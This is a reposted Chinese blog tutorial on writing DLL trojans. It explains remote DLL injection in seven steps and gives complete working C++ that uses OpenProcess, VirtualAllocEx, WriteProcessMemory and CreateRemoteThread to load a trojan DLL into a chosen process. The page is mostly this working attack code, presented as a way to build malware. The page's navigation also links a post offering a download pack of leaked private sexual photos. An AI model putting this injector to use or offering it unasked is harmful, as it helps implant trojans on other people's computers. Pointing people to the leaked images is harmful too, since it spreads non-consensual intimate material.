留下足迹
订阅本站
标签:兔八哥,极品软件园,软件下载,绿色软件
兔八哥极品软件园    运行: 4506天 | 文章:640 篇 | 评论:527 条 | 碎语:1条

VC++DLL木马编写原理DLL远程注入

作者:admin 发布于:2012-6-30 16:43 Saturday 分类:网络转载


从DLL木马注入程序的源代码中我们可以分析出DLL木马注入的一般步骤为:
  (1)取得宿主进程(即要注入木马的进程)的进程ID dwRemoteProcessId;
  (2)取得DLL的完全路径,并将其转换为宽字符模式pszLibFileName;
  (3)利用Windows API OpenProcess打开宿主进程,应该开启下列选项:
  a.PROCESS_CREATE_THREAD:允许在宿主进程中创建线程;
  b.PROCESS_VM_OPERATION:允许对宿主进程中进行VM操作;
  c.PROCESS_VM_WRITE:允许对宿主进程进行VM写。

  (4)利用Windows API VirtualAllocEx函数在远程线程的VM中分配DLL完整路径宽字符所需的存储空间,

            并利用Windows API WriteProcessMemory函数将完整路径写入该存储空间;

  (5)利用Windows API GetProcAddress取得Kernel32模块中LoadLibraryW函数的地址,

            这个函数将作为随后将启动的远程线程的入口函数;

  (6)利用Windows API CreateRemoteThread启动远程线程,将LoadLibraryW的地址作为远程线程的

            入口函数地址, 将宿主进程里被分配空间中存储的完整DLL路径作为线程入口函数的参数以另其启动指定的DLL

  (7)清理现场。
#include <windows.h>
#include <stdlib.h>
#include <stdio.h>

void CheckError ( int, int, char *); //出错处理函数

PDWORD pdwThreadId;
HANDLE hRemoteThread, hRemoteProcess;
DWORD fdwCreate, dwStackSize, dwRemoteProcessId;
PWSTR pszLibFileRemote=NULL;

void main(int argc,char **argv)
{
 int iReturnCode;
 char lpDllFullPathName[MAX_PATH];
 WCHAR pszLibFileName[MAX_PATH]={0};

 dwRemoteProcessId = 4000;
 strcpy(lpDllFullPathName, "d:\\troydll.dll");//将DLL文件全路径的ANSI码转换成UNICODE码
 iReturnCode = MultiByteToWideChar(CP_ACP, MB_ERR_INVALID_CHARS,
 lpDllFullPathName, strlen(lpDllFullPathName),
 pszLibFileName, MAX_PATH);
 CheckError(iReturnCode, 0, "MultByteToWideChar");
 
//打开远程进程
 hRemoteProcess = OpenProcess(PROCESS_CREATE_THREAD | //允许创建线程
  PROCESS_VM_OPERATION | //允许VM操作
  PROCESS_VM_WRITE, //允许VM写
  FALSE, dwRemoteProcessId );
 CheckError( (int) hRemoteProcess, NULL, "Remote Process not Exist or Access Denied!");
 
//计算DLL路径名需要的内存空间
 int cb = (1 + lstrlenW(pszLibFileName)) * sizeof(WCHAR);
 pszLibFileRemote = (PWSTR) VirtualAllocEx( hRemoteProcess, NULL, cb, MEM_COMMIT, PAGE_READWRITE);
 CheckError((int)pszLibFileRemote, NULL, "VirtualAllocEx");
 
//将DLL的路径名复制到远程进程的内存空间
 iReturnCode = WriteProcessMemory(hRemoteProcess, pszLibFileRemote, (PVOID) pszLibFileName, cb, NULL);
 CheckError(iReturnCode, false, "WriteProcessMemory");
 
//计算LoadLibraryW的入口地址
 PTHREAD_START_ROUTINE pfnStartAddr = (PTHREAD_START_ROUTINE)
   GetProcAddress(GetModuleHandle(TEXT("Kernel32")), "LoadLibraryW");
 CheckError((int)pfnStartAddr, NULL, "GetProcAddress");
 
//启动远程线程,通过远程线程调用用户的DLL文件
 hRemoteThread = CreateRemoteThread( hRemoteProcess, NULL, 0, pfnStartAddr, pszLibFileRemote, 0, NULL);
 CheckError((int)hRemoteThread, NULL, "Create Remote Thread");
 
//等待远程线程退出
 WaitForSingleObject(hRemoteThread, INFINITE);
 
//清场处理
 if (pszLibFileRemote != NULL)
 {
  VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
 }
 if (hRemoteThread != NULL)
 {
  CloseHandle(hRemoteThread );
 }
 if (hRemoteProcess!= NULL)
 {
  CloseHandle(hRemoteProcess);
 }
}

//错误处理函数CheckError()
void CheckError(int iReturnCode, int iErrorCode, char *pErrorMsg)
{
 if(iReturnCode==iErrorCode)
 {
  printf("%s Error:%d\n\n", pErrorMsg, GetLastError());
  //清场处理
  if (pszLibFileRemote != NULL)
  {
   VirtualFreeEx(hRemoteProcess, pszLibFileRemote, 0, MEM_RELEASE);
  }
  if (hRemoteThread != NULL)
  {
   CloseHandle(hRemoteThread );
  }
  if (hRemoteProcess!= NULL)
  {
   CloseHandle(hRemoteProcess);
  }
  exit(0);
 }
}

« 陈冠希新图 431张艳照门再次流出附打包下载 | PHP操作目录,文件夹,文件»

日历

最新日志

最新评论

链接


Powered by 兔八哥极品软件 苏ICP备12049267号 sitemap